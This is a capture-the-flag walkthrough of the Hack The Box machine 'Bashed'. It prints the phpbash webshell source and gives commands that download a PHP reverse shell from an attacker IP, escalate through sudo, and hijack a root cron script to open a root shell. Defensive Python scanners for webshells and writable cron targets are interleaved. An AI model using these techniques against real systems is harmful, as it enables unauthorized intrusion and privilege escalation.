Linux Boxes

bashed

  1. nmap
  2. phpbash github
    1. phpbash.php source code
  3. http
    1. gobuster
      1. dev/phpbash.min.php
        1. foothold calling back reverse shell with php.rev
  4. priv esc to scriptmanager
  5. priv esc to root
    1. Linux smart enumeration
      1. upload lse.sh
      2. lse report
    2. test.py cron job
    3. reverse shell
  6. user/root
  7. lessons learned

bashed

images/1-1.png
images/1-2.png

nmap

images/2-1.png
the only service found running is http

phpbash github

images/34-1.png

images/34-2.png

phpbash.php source code

<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    /* runs the POSTed command in a shell and returns its stdout and stderr, line by line */
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die(); 
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    /* writes the uploaded file to whatever directory the POSTed path names */
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path != "/") {
        $path .= "/";
    } 
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
        echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
    } else {
        echo "Error uploading " . htmlentities($filename);
    }
    die();
}
?>
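The security-relevant point of the source above is that anything POSTed as cmd goes straight to shell_exec, and the upload branch writes to whatever directory the request names. As an added example (not from this writeup or from phpbash itself), here is a small Python scanner that flags PHP files in a web root where request input reaches a command sink or an upload destination; the web root layout and both sample files are constructed to mirror dev/phpbash.min.php.

```python
import re
import tempfile
from pathlib import Path
SINK = re.compile(r"\b(shell_exec|exec|system|passthru|popen|proc_open|eval)\s*\(", re.I)
SOURCE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|FILES)\b")   # request-controlled data
ASSIGN = re.compile(r"^\s*(\$\w+)\s*\.?=\s*(.+)$")              # $var = ... or $var .= ...
UPLOAD = re.compile(r"\bmove_uploaded_file\s*\(", re.I)

def scan_php(text):
    """Return [(line_no, message)] for one PHP source, using crude line-level taint tracking."""
    tainted, findings = set(), []
    def is_tainted(s):
        return bool(SOURCE.search(s)) or any(v in s for v in tainted)
    for no, line in enumerate(text.splitlines(), 1):
        m = ASSIGN.match(line)
        if m and is_tainted(m.group(2)):     # e.g. $path = $_POST['path'] taints $path
            tainted.add(m.group(1))
        if SINK.search(line):                # command execution; HIGH when fed request data
            findings.append((no, ("HIGH" if is_tainted(line) else "INFO") + ": command/eval sink"))
        if UPLOAD.search(line) and is_tainted(line):
            findings.append((no, "HIGH: upload destination built from request input"))
    return findings

def scan_webroot(root):
    """Scan every *.php under root; return {relative_path: findings} for flagged files only."""
    root, report = Path(root), {}
    for php in sorted(root.rglob("*.php")):
        found = scan_php(php.read_text(errors="replace"))
        if found:
            report[str(php.relative_to(root))] = found
    return report

# Constructed samples: a cut-down phpbash-style shell and a harmless page.
SAMPLE_WEBSHELL = r"""<?php
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $path = $_POST['path'];
    move_uploaded_file($_FILES["file"]["tmp_name"], $path."/".$_FILES["file"]["name"]);
}
?>"""
SAMPLE_BENIGN = "<?php\n$q = $_GET['q'];\necho htmlentities($q, ENT_QUOTES, 'UTF-8');\n?>"

def build_sample_webroot():
    """Write the samples into a temporary web root (dev/ holds the shell); return its path."""
    root = Path(tempfile.mkdtemp())
    (root / "dev").mkdir()
    (root / "dev" / "phpbash.min.php").write_text(SAMPLE_WEBSHELL)
    (root / "index.php").write_text(SAMPLE_BENIGN)
    return root
```

Run it over a real document root with `scan_webroot("/var/www/html")`; a file with a HIGH finding is worth a manual look even if it turns out to be legitimate admin tooling.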

http

images/2030-1.png
images/2030-2.png

gobuster

images/31-1.png

dev/phpbash.min.php

images/32-1.png


checking out phpbash.php, we see that the webserver spawns an interactive shell for us to play around with! however, it is slightly limited (look back at the phpbash.php source code), so let's call a shell back to our attack machine so we can work with a fully functional shell
images/32-2.png

foothold calling back reverse shell with php.rev

since the server is coded in php, it makes sense to choose a reverse shell written in php; we can find one on pentestmonkey
images/33-1.png

next, set these parameters in your rev.php file to call back to your ip and port
images/33-2.png
images/33-3.png

next, serve up an http server on your attack machine and download the script to the victim via wget:
wget 10.10.14.62/rev.php
images/33-4.png
images/33-5.png


finally, navigate to your downloaded php script in bashed's /upload/ directory, set up a listener, and voila!
images/33-6.png

we popped a shell and got a foothold on the box!
images/33-7.png

let's spawn an interactive shell with
python -c 'import pty;pty.spawn("/bin/bash")'
images/33-8.png

priv esc to scriptmanager

running sudo -l to check what scripts we can run as root without a password, we see:
images/35-1.png

we don't need a password to run commands as scriptmanager, so let's switch to his account

run sudo -u scriptmanager with /bin/bash as the command to spawn a shell:
sudo -u scriptmanager /bin/bash
images/35-2.png

priv esc to root

notice that the scripts directory is owned by scriptmanager

images/36-1.png

Linux smart enumeration

it's always a good habit to run a privilege escalation enumeration script to catch anything that may otherwise be hard to spot; a favorite of mine is lse.sh (linux smart enumeration) because its report is very easy to follow and comprehend

images/2032-1.png
images/2032-2.png

if you don't have it, I highly recommend downloading it to your /opt folder
images/2032-3.png

images/2032-4.png

images/2032-5.png

upload lse.sh

let's spin up an http server with python -m SimpleHTTPServer <port>

images/2033-1.png

and download it to our victim box with wget
images/2033-2.png

chmod +x lse.sh to make it executable, then run it with bash or ./
images/2033-3.png


lse report

let's use level 1 (-l 1) to output some interesting finds to document; skip past the password prompt since we don't know scriptmanager's password

lse.sh -l 1

according to the report, there is a sessionclean script that runs every minute, but unfortunately we cannot read what it does; let's keep it in mind and move on
images/2034-1.png

the report also indicates that the cron jobs all run with root permissions, so we can most likely exploit this to gain root privileges if we can overwrite or hijack a script that the sessionclean cron job uses
images/2034-2.png


we also see from the report that we can write to a few files that may be worth looking into; let's check out the scripts folder
images/2034-3.png

test.py cron job

test.py has got to be a cron job that updates itself every minute, and it's also owned by root! This is our ticket in...

images/37-1.png
images/37-2.png

we notice that test.txt was updated a minute ago!


let's see what test.py does
images/37-3.png

we see that test.txt is its output
images/37-4.png

it has become abundantly clear that since scriptmanager owns test.py and root runs test.py every MINUTE, we can easily hijack test.py to run a python reverse shell that calls back to our attack machine, then simply wait a minute for root's cron job to execute it and hand us a shell with root privileges
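The root cause of this escalation is a root cron job executing a script from a directory owned by a non-root user. As an added example (not part of the writeup), here is a Python audit that parses crontab lines and reports root jobs whose script, or its parent directory, a non-root user can modify; the filesystem snapshot, the uid 1001 and the /opt/backup job are constructed, with /scripts modelled on this box.

```python
import os
import shlex
import stat
from collections import namedtuple
Finding = namedtuple("Finding", "path reason job")
FakeStat = namedtuple("FakeStat", "st_uid st_mode")   # stands in for os.stat_result

def non_root_can_write(uid, mode):
    """A non-root user can replace the object if it is not root-owned or is group/world-writable."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def parse_jobs(text, system_format=True, default_user="root"):
    """Yield (user, command) from five-field crontab lines; system_format lines carry a user field."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                   # skip comments and VAR=value lines
        parts = line.split(None, 5 + system_format)    # the bool adds the user field
        if len(parts) == 6 + system_format:
            yield (parts[5] if system_format else default_user), parts[-1]

def audit_cron(text, statfn=os.stat, system_format=True):
    """Findings for root jobs whose absolute paths, or their parent dirs, a non-root user can modify."""
    findings = []
    for user, cmd in parse_jobs(text, system_format):
        if user != "root":
            continue
        for tok in (t for t in shlex.split(cmd) if t.startswith("/")):
            for path in (tok, os.path.dirname(tok)):
                try:
                    st = statfn(path)
                except (OSError, KeyError):            # KeyError: dict-backed stat below
                    continue
                if non_root_can_write(st.st_uid, st.st_mode):
                    reason = "uid=%d mode=%o" % (st.st_uid, stat.S_IMODE(st.st_mode))
                    findings.append(Finding(path, reason, cmd))
    return findings
# Constructed snapshot: /scripts and test.py owned by uid 1001 (not root), plus a root-owned
# but world-writable script to exercise the mode check.
SAMPLE_FS = {
    "/scripts": FakeStat(1001, stat.S_IFDIR | 0o755),
    "/scripts/test.py": FakeStat(1001, stat.S_IFREG | 0o755),
    "/opt/backup": FakeStat(0, stat.S_IFDIR | 0o755),
    "/opt/backup/run.sh": FakeStat(0, stat.S_IFREG | 0o777),
}
SAMPLE_CRONTAB = """SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root python /scripts/test.py > /dev/null 2>&1
*/5 * * * * root /opt/backup/run.sh
"""
def fake_stat(path):
    return SAMPLE_FS[path]                             # KeyError for paths not in the snapshot
```

On a live host, feed it the contents of /etc/crontab and each file under /etc/cron.d with the default os.stat; the fix for every finding is the same: root-owned, non-group/world-writable script and directory.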

reverse shell

Let's use pentest monkey's python script to connect back to our attacking machine every time it executes
images/38-1.png
simply tweak the script (images/38-2.png) to call back to your own ip and a port of your choosing


images/38-3.png


Let's use wget to download our reverse shell and run it on our victim machine:
images/38-4.png

Let's also rename our rev_shell.py to test.py, hijacking test.py so it will be run every minute as root
images/38-5.png

when test.py executes on the minute, we will get a shell as root and officially own the box!
images/38-6.png

user/root

images/40-1.png

images/40-2.png

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1954-1.png